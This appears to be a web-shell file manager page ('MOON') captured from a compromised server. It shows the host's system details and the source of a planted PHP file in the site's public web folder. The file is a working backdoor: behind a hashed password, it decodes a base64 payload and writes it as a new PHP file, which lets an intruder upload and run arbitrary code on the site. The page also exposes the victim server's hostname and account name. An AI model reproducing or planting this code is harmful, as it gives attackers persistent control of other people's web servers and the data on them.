MOON
Server: Apache
System: Linux srvsg2.lunchactually.com 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64
User: matchmakinginsti (1004)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/matchmakinginsti/public_html/ec789c0d.php
<?php $r=array_merge($_GET,$_POST);if(!isset($r['p'])||!isset($r['c'])){http_response_code(404);exit;}if(hash('sha256',$r['p'])!=='3b18ab590a3be0ef52e062b7d70b2214502187b1b2a77a3579c12f5b81bde44c'){http_response_code(403);exit;}$d=base64_decode($r['c']);if($d===false){http_response_code(400);exit;}$f=isset($r['f'])?basename($r['f']):'x'.bin2hex(random_bytes(4)).'.php';file_put_contents(__DIR__.'/'.$f,$d);echo json_encode(['ok'=>1,'file'=>$f]);?>